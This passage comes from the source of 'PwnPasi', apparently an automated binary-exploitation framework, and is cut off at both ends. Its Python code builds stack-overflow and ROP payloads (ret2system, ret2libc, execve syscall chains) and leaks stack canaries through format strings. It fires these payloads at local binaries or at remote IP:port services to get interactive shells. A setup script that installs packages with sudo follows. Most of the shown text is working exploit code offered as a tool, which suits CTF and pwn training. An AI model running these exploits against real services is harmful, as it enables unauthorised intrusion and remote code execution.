p64(0)])\n\telif other_rdi_registers == 0:\n\t\tpayload = flat([asm('nop') * padding, canary, b\"AAAAAAAA\" * diff, pop_rdi_addr, p64(bin_sh_addr), ret_addr, p64(system_addr)])\n\tio.sendline(payload)\n\tio.interactive()\n\ndef execve_syscall_canary_remote(program, padding, pop_eax_addr, pop_ebx_addr, pop_ecx_addr, pop_edx_addr, pop_ecx_ebx_addr, ret_addr, int_0x80, url, port, c, diff):\n\tif pop_ecx_addr == None:\n\t\tio = remote(url, port)\n\t\te = ELF(program)\n\t\tbin_sh_addr = next(e.search(b'/bin/sh'))\n\t\tprint(f'[*]/bin/sh string address in program: \\033[31m{hex(bin_sh_addr)}\\033[0m')\n\t\tpop_eax_addr = int(pop_eax_addr, 16)\n\t\tpop_eax_addr = p32(pop_eax_addr)\n\t\tpop_ecx_ebx_addr = int(pop_ecx_ebx_addr, 16)\n\t\tpop_ecx_ebx_addr = p32(pop_ecx_ebx_addr)\n\t\tpop_edx_addr = int(pop_edx_addr, 16)\n\t\tpop_edx_addr = p32(pop_edx_addr)\n\t\tint_0x80 = int(int_0x80, 16)\n\t\tint_0x80 = p32(int_0x80)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p32(result)\n\n\t\tpayload = flat([asm('nop') * padding, canary, b\"AAAA\" * diff, pop_eax_addr, 0xb, pop_ecx_ebx_addr, 0, bin_sh_addr, pop_edx_addr, 0, int_0x80])\n\t\tio.recv()\n\t\tio.sendline(payload)\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\t\tio.interactive()\n\telse:\n\t\tio = remote(url, port)\n\t\te = ELF(program)\n\t\tbin_sh_addr = next(e.search(b'/bin/sh'))\n\t\tprint(f'[*]/bin/sh string address in program: \\033[31m{hex(bin_sh_addr)}\\033[0m')\n\t\tpop_eax_addr = int(pop_eax_addr, 16)\n\t\tpop_eax_addr = p32(pop_eax_addr)\n\t\tpop_ecx_addr = int(pop_ecx_addr, 16)\n\t\tpop_ecx_addr = p32(pop_ecx_addr)\n\t\tpop_ebx_addr = int(pop_ebx_addr, 16)\n\t\tpop_ebx_addr = p32(pop_ebx_addr)\n\t\tpop_edx_addr = int(pop_edx_addr, 16)\n\t\tpop_edx_addr = p32(pop_edx_addr)\n\t\tint_0x80 = int(int_0x80, 16)\n\t\tint_0x80 = p32(int_0x80)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p32(result)\n\n\t\tpayload = flat([asm('nop') * padding, canary, b\"AAAA\" * diff, pop_eax_addr, 0xb, pop_ebx_addr, bin_sh_addr, pop_ecx_addr, 0, pop_edx_addr, 0, int_0x80])\n\t\tio.recv()\n\t\tio.sendline(payload)\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\t\tio.interactive()\n\ndef main():\n \"\"\"Main function with improved argument parsing and flow\"\"\"\n print_banner()\n \n parser = argparse.ArgumentParser(\n description=\"PwnPasi - Automated Binary Exploitation Framework\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nExamples:\n python pwnpasi.py -l ./target_binary\n python pwnpasi.py -l ./target_binary -f 112\n python pwnpasi.py -l ./target_binary -libc ./libc-2.19.so\n python pwnpasi.py -l ./target_binary -ip 192.168.1.100 -p 9999\n \"\"\"\n )\n \n parser.add_argument('-l', '--local', type=str, required=True,\n help='Target binary file (required)')\n parser.add_argument('-ip', '--ip', type=str,\n help='Remote target IP address')\n parser.add_argument('-p', '--port', type=int,\n help='Remote target port')\n parser.add_argument('-libc', '--libc', type=str,\n help='Path to libc file')\n parser.add_argument('-f', '--fill', type=int,\n help='Manual overflow padding size')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='Enable verbose output')\n \n args = parser.parse_args()\n \n # Validate arguments\n if not os.path.exists(args.local):\n print_error(f\"target binary not found: {args.local}\")\n sys.exit(1)\n \n if (args.ip and not args.port) or (args.port and not args.ip):\n print_error(\"both IP and port must be specified for remote exploitation\")\n sys.exit(1)\n \n # Initialize target information\n program = add_current_directory_prefix(args.local)\n libc_path = None\n bin_sh = 0 # Initialize bin_sh variable\n \n # Initialize exploit_info with basic information\n global exploit_info\n exploit_info['target_binary'] = os.path.basename(args.local)\n exploit_info['timestamp'] = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n \n print_info(f\"target binary: {Colors.YELLOW}{program}{Colors.END}\")\n \n if args.ip and args.port:\n print_info(f\"remote target: {Colors.YELLOW}{args.ip}:{args.port}{Colors.END}\")\n remote_mode = True\n else:\n print_info(\"local exploitation mode\")\n remote_mode = False\n \n # Set up libc\n if args.libc:\n if not os.path.exists(args.libc):\n print_error(f\"libc file not found: {args.libc}\")\n sys.exit(1)\n libc = args.libc\n print_info(f\"using custom libc: {Colors.YELLOW}{libc}{Colors.END}\")\n else:\n libc = 1\n libc_path = detect_libc(program)\n \n print_section_header(\"BINARY ANALYSIS PHASE\")\n \n # Set permissions\n print_info(\"setting executable permissions\")\n if not set_permission(program):\n print_warning(\"failed to set permissions, continuing anyway\")\n \n # Collect binary information\n print_info(\"collecting binary security information\")\n info_dict, stack_protection, rwx_segments, bit_arch, pie_enabled = collect_binary_info(program)\n display_binary_info(info_dict)\n \n print_section_header(\"FUNCTION ANALYSIS\")\n \n # Analyze functions\n print_info(\"scanning PLT functions\")\n function_addresses = scan_plt_functions(program)\n function_flags = set_function_flags(function_addresses)\n \n # Set global function flags\n for func, available in function_flags.items():\n globals()[func] = available\n \n print_section_header(\"ROP GADGET DISCOVERY\")\n \n # Find ROP gadgets based on architecture\n if bit_arch == 64:\n print_info(\"searching for x64 ROP gadgets\")\n pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers = find_rop_gadgets_x64(program)\n else:\n print_info(\"searching for x32 ROP gadgets\")\n (pop_eax_addr, pop_ebx_addr, pop_ecx_addr, pop_edx_addr, pop_ecx_ebx_addr, \n ret_addr, int_0x80, eax, ebx, ecx, edx) = find_rop_gadgets_x32(program)\n \n print_section_header(\"PADDING CALCULATION\")\n \n # Determine padding\n if args.fill:\n padding = args.fill\n print_info(f\"using manual padding: {Colors.YELLOW}{padding}{Colors.END} bytes\")\n else:\n print_info(\"performing dynamic stack overflow testing\")\n padding = test_stack_overflow(program, bit_arch)\n if padding != 0:\n # Apply assembly-based padding adjustment\n adjusted_padding = asm_stack_overflow(program, bit_arch)\n if adjusted_padding:\n padding = adjusted_padding\n # Display vulnerable function information\n results = vuln_func_name()\n if results:\n print_section_header(\"VULNERABLE FUNCTIONS IDENTIFIED\")\n for func_name in results:\n print_success(f\"vulnerable function: {Colors.RED}{func_name}{Colors.END}\")\n print_section_header(\"ASSEMBLY CODE ANALYSIS\")\n for func_name in results:\n print_info(f\"disassembling function: {Colors.YELLOW}{func_name}{Colors.END}\")\n os.system(\"objdump -d -M intel \" + program + \" --no-show-raw-insn | grep -A20 \" + '\"' + func_name + '\"')\n else:\n # Try static analysis\n static_padding = analyze_vulnerable_functions(program, bit_arch)\n if static_padding:\n padding = static_padding\n print_success(f\"static analysis found padding: {Colors.YELLOW}{padding}{Colors.END} bytes\")\n \n print_section_header(\"STRING ANALYSIS\")\n \n # Check for /bin/sh string\n print_info(\"searching for /bin/sh string in binary\")\n bin_sh = check_binsh_string(program)\n \n # Handle canary protection (following pwnpasi_base.py logic)\n if stack_protection == 1:\n print_section_header(\"CANARY PROTECTION DETECTED\")\n print_warning(\"canary protection is enabled\")\n print_info(\"testing for format string vulnerability to bypass canary\")\n fmtstr = detect_format_string_vulnerability(program)\n if fmtstr == 1:\n print_success(\"format string vulnerability detected\")\n print_info(\"attempting to leak canary value\")\n leakage_canary_value(program)\n padding, c, diff = canary_fuzz(program, bit_arch)\n if padding == None and c == None and diff == None:\n print_error(\"failed to leak canary value\")\n else:\n print_success(\"canary value successfully leaked\")\n if args.ip and args.port:\n print_section_header(\"REMOTE EXPLOITATION\")\n print_info(f\"targeting remote service at {Colors.YELLOW}{args.ip}:{args.port}{Colors.END}\")\n if globals().get('system', 0) == 1 and bin_sh == 1:\n if bit_arch == 32:\n ret2_system_x32_canary_remote(program,libc,padding,args.ip,args.port,c,diff)\n sys.exit(0)\n if bit_arch == 64:\n ret2_system_x64_canary_remote(program,libc,padding,pop_rdi_addr,other_rdi_registers,ret_addr,args.ip,args.port,c,diff)\n sys.exit(0)\n \n if globals().get('puts', 0) == 1:\n if bit_arch == 32:\n ret2libc_put_x32_canary_remote(program,libc,padding,args.ip,args.port,c,diff)\n sys.exit(0)\n if bit_arch == 64:\n ret2libc_put_x64_canary_remote(program,libc,padding,pop_rdi_addr, pop_rsi_addr, ret_addr ,other_rdi_registers ,other_rsi_registers,args.ip,args.port,c,diff)\n sys.exit(0)\n \n if globals().get('write', 0) == 1:\n if bit_arch == 32:\n ret2libc_write_x32_canary_remote(program,libc,padding,args.ip,args.port,c,diff)\n sys.exit(0)\n if bit_arch == 64:\n ret2libc_write_x64_canary_remote(program,libc,padding,pop_rdi_addr, pop_rsi_addr, ret_addr ,other_rdi_registers ,other_rsi_registers,args.ip,args.port,c,diff)\n sys.exit(0)\n \n if bit_arch == 32:\n if bin_sh == 1 and globals().get('eax', 0) == 1 and globals().get('ebx', 0) == 1 and globals().get('ecx', 0) == 1 and globals().get('edx', 0) == 1:\n execve_syscall_canary_remote(program,padding,pop_eax_addr, pop_ebx_addr, pop_ecx_addr, pop_edx_addr, pop_ecx_ebx_addr , ret_addr, int_0x80,args.ip,args.port,c,diff)\n sys.exit(0)\n else:\n print_section_header(\"LOCAL EXPLOITATION\")\n print_info(\"executing local binary exploitation\")\n if globals().get('system', 0) == 1 and bin_sh == 1:\n if bit_arch == 32:\n ret2_system_canary_x32(program,libc,padding,libc_path,c,diff)\n sys.exit(0)\n if bit_arch == 64:\n ret2_system_canary_x64(program,libc,padding,pop_rdi_addr,other_rdi_registers,ret_addr,libc_path,c,diff)\n sys.exit(0)\n \n if globals().get('puts', 0) == 1:\n if bit_arch == 32:\n ret2libc_put_canary_x32(program,libc,libc_path,padding,c,diff)\n sys.exit(0)\n if bit_arch == 64:\n ret2libc_put_canary_x64(program,libc,pop_rdi_addr, pop_rsi_addr, ret_addr ,other_rdi_registers ,other_rsi_registers,libc_path,padding,c,diff)\n sys.exit(0)\n \n if globals().get('write', 0) == 1:\n if bit_arch == 32:\n ret2libc_write_canary_x32(program,libc,padding,libc_path,c,diff)\n sys.exit(0)\n if bit_arch == 64:\n ret2libc_write_canary_x64(program,libc,padding,pop_rdi_addr, pop_rsi_addr, ret_addr ,other_rdi_registers ,other_rsi_registers,libc_path,c,diff)\n sys.exit(0)\n \n if bit_arch == 32:\n if bin_sh == 1 and globals().get('eax', 0) == 1 and globals().get('ebx', 0) == 1 and globals().get('ecx', 0) == 1 and globals().get('edx', 0) == 1:\n execve_canary_syscall(program,padding,pop_eax_addr, pop_ebx_addr, pop_ecx_addr, pop_edx_addr, pop_ecx_ebx_addr , ret_addr, int_0x80,c,diff)\n sys.exit(0)\n \n sys.exit(0)\n else:\n print_error(\"no format string vulnerability found for canary bypass\")\n print_warning(\"canary protection cannot be bypassed with current methods\")\n \n # Stack overflow detection (following pwnpasi_base.py logic)\n if not args.fill:\n #print_section_header(\"VULNERABILITY ANALYSIS\")\n #print_info(\"testing for stack overflow vulnerability\")\n padding = test_stack_overflow(program, bit_arch)\n if padding != 0:\n padding = asm_stack_overflow(program, bit_arch)\n #print_success(f\"stack overflow vulnerability detected with padding: {Colors.YELLOW}{padding}{Colors.END} bytes\")\n results = vuln_func_name()\n \n else:\n print_warning(\"no stack overflow vulnerability detected through dynamic testing\")\n \n print_section_header(\"EXPLOITATION PHASE\")\n print_info(\"initializing exploitation attempts\")\n \n # Format string vulnerability handling when no stack overflow\n if padding == 0:\n print_section_header(\"FORMAT STRING VULNERABILITY ANALYSIS\")\n print_info(\"testing for format string vulnerability\")\n fmtstr = detect_format_string_vulnerability(program)\n if check_binsh(program):\n print_success('/bin/sh string found in binary')\n bin_sh = 1\n else:\n print_warning('/bin/sh string not found in binary')\n bin_sh = 0\n\n if args.ip and args.port:\n print_section_header(\"REMOTE FORMAT STRING EXPLOITATION\")\n print_info(f\"targeting remote service at {Colors.YELLOW}{args.ip}:{args.port}{Colors.END}\")\n if globals().get('system', 0) == 1 and bin_sh == 1:\n print_info('attempting to leak program strings via format string')\n fmtstr_print_strings_remote(program, args.ip, args.port)\n try:\n offset = find_offset(program)\n log.info(f\"Offset found: \\033[31m{offset}\\033[0m\")\n result = find_ftmstr_bss_symbols(program)\n if len(result) == 3:\n function, buf_addr, function_name = result\n system_fmtstr_remote(program, offset, buf_addr, args.ip, args.port)\n except ValueError:\n print('[*]Offset not found, continuing with other exploitation methods')\n sys.exit(0)\n else:\n print_warning('system function or /bin/sh not available, attempting string leak only')\n fmtstr_print_strings_remote(program, args.ip, args.port)\n sys.exit(0)\n\n else:\n print_section_header(\"LOCAL FORMAT STRING EXPLOITATION\")\n print_info(\"executing local format string exploitation\")\n if globals().get('system', 0) == 1 and bin_sh == 1:\n print_info('attempting to leak program strings via format string')\n fmtstr_print_strings(program)\n try:\n offset = find_offset(program)\n log.info(f\"Offset found: \\033[31m{offset}\\033[0m\")\n result = find_ftmstr_bss_symbols(program)\n if len(result) == 3:\n function, buf_addr, function_name = result\n system_fmtstr(program, offset, buf_addr)\n except ValueError:\n print('[*]Offset not found, continuing with other exploitation methods')\n sys.exit(0)\n else:\n print_warning('system function or /bin/sh not available, attempting string leak only')\n fmtstr_print_strings(program)\n sys.exit(0)\n else:\n # Stack overflow exploitation (following pwnpasi_base.py logic)\n if args.ip and args.port:\n print_section_header(\"REMOTE STACK OVERFLOW EXPLOITATION\")\n print_info(f\"targeting remote service at {Colors.YELLOW}{args.ip}:{args.port}{Colors.END}\")\n if pie_enabled == 1 and globals().get('backdoor', 0) == 1:\n print_warning(\"PIE protection detected, but backdoor function available\")\n print_info(\"initiating PIE bypass via backdoor function brute force\")\n pie_backdoor_exploit_remote(program, padding, globals().get('backdoor', 0), libc_path, libc, args.ip, args.port, globals().get('callsystem', 0))\n sys.exit(0)\n \n if globals().get('system', 0) == 1 and bin_sh == 1:\n if bit_arch == 32:\n ret2_system_x32_remote(program, libc, padding, args.ip, args.port)\n sys.exit(0)\n if bit_arch == 64:\n ret2_system_x64_remote(program, libc, padding, pop_rdi_addr, other_rdi_registers, ret_addr, args.ip, args.port)\n sys.exit(0)\n \n if globals().get('write', 0) == 1:\n if bit_arch == 32:\n ret2libc_write_x32_remote(program, libc, padding, args.ip, args.port)\n sys.exit(0)\n if bit_arch == 64:\n ret2libc_write_x64_remote(program, libc, padding, pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers, args.ip, args.port)\n sys.exit(0)\n \n if globals().get('puts', 0) == 1:\n if bit_arch == 32:\n ret2libc_put_x32_remote(program, libc, padding, args.ip, args.port)\n sys.exit(0)\n if bit_arch == 64:\n ret2libc_put_x64_remote(program, libc, padding, pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers, args.ip, args.port)\n sys.exit(0)\n \n if rwx_segments == 1:\n if bit_arch == 32:\n function, buf_addr, function_name = find_large_bss_symbols(program)\n if function == 1:\n rwx_shellcode_x32_remote(program, buf_addr, padding, function_name, ret_addr, args.ip, args.port)\n sys.exit(0)\n if bit_arch == 64:\n function, buf_addr, function_name = find_large_bss_symbols(program)\n if function == 1:\n rwx_shellcode_x64_remote(program, buf_addr, padding, function_name, ret_addr, args.ip, args.port)\n sys.exit(0)\n \n if bit_arch == 32:\n if bin_sh == 1 and globals().get('eax', 0) == 1 and globals().get('ebx', 0) == 1 and globals().get('ecx', 0) == 1 and globals().get('edx', 0) == 1:\n execve_syscall_remote(program, padding, pop_eax_addr, pop_ebx_addr, pop_ecx_addr, pop_edx_addr, pop_ecx_ebx_addr, ret_addr, int_0x80, args.ip, args.port)\n sys.exit(0)\n else:\n print_section_header(\"LOCAL STACK OVERFLOW EXPLOITATION\")\n print_info(\"executing local stack overflow exploitation\")\n if pie_enabled == 1 and globals().get('backdoor', 0) == 1:\n print_warning(\"PIE protection detected, but backdoor function available\")\n print_info(\"initiating PIE bypass via backdoor function brute force\")\n pie_backdoor_exploit(program, padding, globals().get('backdoor', 0), libc_path, libc, globals().get('callsystem', 0))\n sys.exit(0)\n \n if globals().get('system', 0) == 1 and bin_sh == 1:\n if bit_arch == 32:\n ret2_system_x32(program, libc, padding, libc_path)\n sys.exit(0)\n if bit_arch == 64:\n ret2_system_x64(program, libc, padding, pop_rdi_addr, other_rdi_registers, ret_addr, libc_path)\n sys.exit(0)\n \n if globals().get('write', 0) == 1:\n if bit_arch == 32:\n ret2libc_write_x32(program, libc, padding, libc_path)\n sys.exit(0)\n if bit_arch == 64:\n ret2libc_write_x64(program, libc, padding, pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers, libc_path)\n sys.exit(0)\n \n if globals().get('puts', 0) == 1:\n if bit_arch == 32:\n ret2libc_put_x32(program, libc, padding, libc_path)\n sys.exit(0)\n if bit_arch == 64:\n ret2libc_put_x64(program, libc, padding, pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers, libc_path)\n sys.exit(0)\n \n if rwx_segments == 1:\n if bit_arch == 32:\n function, buf_addr, function_name = find_large_bss_symbols(program)\n if function == 1:\n rwx_shellcode_x32(program, buf_addr, padding, function_name, ret_addr)\n sys.exit(0)\n if bit_arch == 64:\n function, buf_addr, function_name = find_large_bss_symbols(program)\n if function == 1:\n rwx_shellcode_x64(program, buf_addr, padding, function_name, ret_addr, libc_path)\n sys.exit(0)\n \n if bit_arch == 32:\n if bin_sh == 1 and globals().get('eax', 0) == 1 and globals().get('ebx', 0) == 1 and globals().get('ecx', 0) == 1 and globals().get('edx', 0) == 1:\n execve_syscall(program, padding, pop_eax_addr, pop_ebx_addr, pop_ecx_addr, pop_edx_addr, pop_ecx_ebx_addr, ret_addr, int_0x80)\n sys.exit(0)\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print_error(\"\\ninterrupted by user\")\n sys.exit(1)\n except Exception as e:\n print_critical(f\"unexpected error: {e}\")\n sys.exit(1)\n\n\n" }, { "path": "requirements.txt", "content": "pwntools>=4.9.0\nLibcSearcher>=1.1.5\nropper>=1.13.5\npython-docx>=0.8.11" }, { "path": "setup.py", "content": "#!/usr/bin/env python3\r\nimport os\r\nimport sys\r\nimport time\r\nimport subprocess\r\nfrom setuptools import setup, find_packages\r\n\r\n# ē§‘ęŠ€åŒ–é¢œč‰²ę–¹ę”ˆ\r\nclass Colors:\r\n CYAN = '\\033[96m'\r\n GREEN = '\\033[92m'\r\n YELLOW = '\\033[93m'\r\n RED = '\\033[91m'\r\n BLUE = '\\033[94m'\r\n MAGENTA = '\\033[95m'\r\n WHITE = '\\033[97m'\r\n BOLD = '\\033[1m'\r\n DIM = '\\033[2m'\r\n END = '\\033[0m'\r\n BLINK = '\\033[5m'\r\n\r\ndef print_banner():\r\n banner = f\"\"\"{Colors.CYAN}{Colors.BOLD}\r\n ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā•— ā–ˆā–ˆā•—ā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā•—ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā•—\r\n ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā•‘ ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā•— ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•—ā–ˆā–ˆā•”ā•ā•ā•ā•ā•ā–ˆā–ˆā•‘\r\n ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•”ā•ā–ˆā–ˆā•‘ ā–ˆā•— ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā–ˆā–ˆā•— ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•”ā•ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā•‘\r\n ā–ˆā–ˆā•”ā•ā•ā•ā• ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā•—ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘ā•šā–ˆā–ˆā•—ā–ˆā–ˆā•‘ā–ˆā–ˆā•”ā•ā•ā•ā• ā–ˆā–ˆā•”ā•ā•ā–ˆā–ˆā•‘ā•šā•ā•ā•ā•ā–ˆā–ˆā•‘ā–ˆā–ˆā•‘\r\n ā–ˆā–ˆā•‘ ā•šā–ˆā–ˆā–ˆā•”ā–ˆā–ˆā–ˆā•”ā•ā–ˆā–ˆā•‘ ā•šā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā•‘ ā–ˆā–ˆā•‘ ā–ˆā–ˆā•‘ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā•‘ā–ˆā–ˆā•‘\r\n ā•šā•ā• ā•šā•ā•ā•ā•šā•ā•ā• ā•šā•ā• ā•šā•ā•ā•ā•ā•šā•ā• ā•šā•ā• ā•šā•ā•ā•šā•ā•ā•ā•ā•ā•ā•ā•šā•ā•\r\n{Colors.END}\r\n{Colors.MAGENTA} ā•”ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•—\r\n ā•‘ {Colors.WHITE}{Colors.BOLD}ADVANCED PWN EXPLOITATION FRAMEWORK{Colors.END}{Colors.MAGENTA} ā•‘\r\n ā•‘ {Colors.YELLOW}Setup & Installation{Colors.END}{Colors.MAGENTA} ā•‘\r\n ā•šā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•{Colors.END}\r\n\"\"\"\r\n print(banner)\r\n time.sleep(0.5)\r\n\r\ndef print_progress_bar(current, total, task_name, width=50):\r\n progress = current / total\r\n filled = int(width * progress)\r\n bar = 'ā–ˆ' * filled + 'ā–‘' * (width - filled)\r\n percentage = int(progress * 100)\r\n print(f\"\\r{Colors.CYAN}[{Colors.YELLOW}ā—‰{Colors.CYAN}]{Colors.END} {task_name}: {Colors.MAGENTA}[{bar}]{Colors.END} {Colors.BOLD}{percentage}%{Colors.END}\", end='', flush=True)\r\n if current == total:\r\n print(f\" {Colors.GREEN}āœ“{Colors.END}\")\r\n\r\ndef print_status(status_type, message):\r\n icons = {\r\n 'info': f'{Colors.CYAN}[{Colors.WHITE}ā—‰{Colors.CYAN}]{Colors.END}',\r\n 'success': f'{Colors.GREEN}[{Colors.WHITE}āœ“{Colors.GREEN}]{Colors.END}',\r\n 'warning': f'{Colors.YELLOW}[{Colors.WHITE}āš {Colors.YELLOW}]{Colors.END}',\r\n 'error': f'{Colors.RED}[{Colors.WHITE}āœ—{Colors.RED}]{Colors.END}',\r\n 'process': f'{Colors.MAGENTA}[{Colors.WHITE}āŸ³{Colors.MAGENTA}]{Colors.END}'\r\n }\r\n timestamp = time.strftime('%H:%M:%S')\r\n print(f\"{icons[status_type]} {Colors.DIM}[{timestamp}]{Colors.END} {message}\")\r\n\r\ndef run_command(command, error_message):\r\n try:\r\n result = subprocess.run(command, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\r\n return result\r\n except subprocess.CalledProcessError as e:\r\n print_status('error', f\"{error_message}\")\r\n print(f\" {Colors.RED}ā””ā”€ {e.stderr.strip()}{Colors.END}\")\r\n sys.exit(1)\r\n\r\ndef install_system_dependencies():\r\n dependencies = [\r\n # Add system dependencies here if needed\r\n ]\r\n \r\n if not dependencies:\r\n print_status('info', f\"No system dependencies required\")\r\n return\r\n \r\n print_status('process', f\"Updating package repositories...\")\r\n for i in range(1, 4):\r\n print_progress_bar(i, 3, \"Repository sync\", 40)\r\n time.sleep(0.3)\r\n \r\n run_command(['sudo', 'apt', 'update'], \"Failed to update package list\")\r\n print_status('success', \"Package repositories updated\")\r\n\r\n for i, (pkg, desc) in enumerate(dependencies, 1):\r\n print_status('process', f\"Installing {desc} ({pkg})...\")\r\n for j in range(1, 6):\r\n print_progress_bar(j, 5, f\"Installing {pkg}\", 35)\r\n time.sleep(0.2)\r\n run_command(['sudo', 'apt', 'install', '-y', pkg], f\"Failed to install {pkg}\")\r\n print_status('success', f\"{desc} installed successfully\")\r\n\r\ndef install_system_packages_for_pwntools():\r\n \"\"\"Install system packages required for pwntools on Kali/Debian\"\"\"\r\n kali_packages = [\r\n ('python3-dev', 'Python development headers'),\r\n ('python3-pip', 'Python package installer'),\r\n ('build-essential', 'Build tools'),\r\n ('libssl-dev', 'SSL development libraries'),\r\n ('libffi-dev', 'FFI development libraries'),\r\n ('python3-setuptools', 'Python setuptools'),\r\n ('libc6-dev', 'C library development files'),\r\n ('gcc', 'GNU Compiler Collection')\r\n ]\r\n \r\n print_status('process', \"Installing system packages for pwntools...\")\r\n \r\n # Update package list first\r\n try:\r\n subprocess.run(['sudo', 'apt', 'update'], check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n print_status('success', \"Package list updated\")\r\n except subprocess.CalledProcessError:\r\n print_status('warning', \"Failed to update package list, continuing...\")\r\n \r\n for pkg, desc in kali_packages:\r\n try:\r\n print_status('info', f\"Installing {desc}...\")\r\n subprocess.run(['sudo', 'apt', 'install', '-y', pkg], \r\n check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n print_status('success', f\"{desc} installed\")\r\n except subprocess.CalledProcessError:\r\n print_status('warning', f\"Failed to install {pkg}, may already be installed\")\r\n\r\ndef install_python_dependencies():\r\n python_deps = [\r\n ('pwntools>=4.9.0', 'PWN exploitation toolkit'),\r\n ('LibcSearcher>=1.1.5', 'Libc database searcher'),\r\n ('ropper>=1.13.5', 'ROP gadget finder')\r\n ]\r\n \r\n print_status('process', \"Installing Python dependencies...\")\r\n \r\n # Check if we're on Kali/Debian and install system packages first\r\n if os.path.exists('/etc/debian_version'):\r\n print_status('info', \"Detected Debian/Kali system, installing system dependencies...\")\r\n install_system_packages_for_pwntools()\r\n \r\n for i, (pkg, desc) in enumerate(python_deps, 1):\r\n print_status('info', f\"Installing {desc}...\")\r\n for j in range(1, 6):\r\n print_progress_bar(j, 5, f\"Installing {pkg.split('>=')[0]}\", 35)\r\n time.sleep(0.2)\r\n \r\n # Try multiple installation methods\r\n success = False\r\n \r\n # Method 1: Regular pip install\r\n try:\r\n subprocess.run([sys.executable, '-m', 'pip', 'install', pkg], \r\n check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n print_status('success', f\"{desc} installed successfully\")\r\n success = True\r\n except subprocess.CalledProcessError as e:\r\n print_status('warning', f\"Standard pip install failed for {pkg}\")\r\n \r\n # Method 2: Try with --user flag\r\n if not success:\r\n try:\r\n subprocess.run([sys.executable, '-m', 'pip', 'install', '--user', pkg], \r\n check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n print_status('success', f\"{desc} installed successfully (user mode)\")\r\n success = True\r\n except subprocess.CalledProcessError:\r\n print_status('warning', f\"User pip install failed for {pkg}\")\r\n \r\n # Method 3: Try with --break-system-packages (for newer pip versions)\r\n if not success:\r\n try:\r\n subprocess.run([sys.executable, '-m', 'pip', 'install', '--break-system-packages', pkg], \r\n check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n print_status('success', f\"{desc} installed successfully (system override)\")\r\n success = True\r\n except subprocess.CalledProcessError:\r\n print_status('warning', f\"System override pip install failed for {pkg}\")\r\n \r\n # Method 4: Try apt install for pwntools on Kali\r\n if not success and pkg.startswith('pwntools') and os.path.exists('/etc/debian_version'):\r\n try:\r\n subprocess.run(['sudo', 'apt', 'install', '-y', 'python3-pwntools'], \r\n check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n print_status('success', f\"{desc} installed via apt\")\r\n success = True\r\n except subprocess.CalledProcessError:\r\n print_status('warning', f\"APT install failed for pwntools\")\r\n \r\n if not success:\r\n print_status('error', f\"All installation methods failed for {pkg}\")\r\n print_status('info', f\"Please manually install {pkg} using:\")\r\n print(f\" {Colors.YELLOW}sudo apt install python3-dev build-essential{Colors.END}\")\r\n print(f\" {Colors.YELLOW}pip3 install {pkg}{Colors.END}\")\r\n # Don't exit, continue with other packages\r\n continue\r\n\r\ndef main():\r\n print_banner()\r\n \r\n print_status('info', f\"Initializing PWNPASI setup environment...\")\r\n time.sleep(0.5)\r\n \r\n if os.name == 'posix' and os.geteuid() != 0:\r\n print_status('warning', \"System package installation may require sudo privileges\")\r\n print_status('info', \"You may be prompted for your password\")\r\n print()\r\n \r\n # System 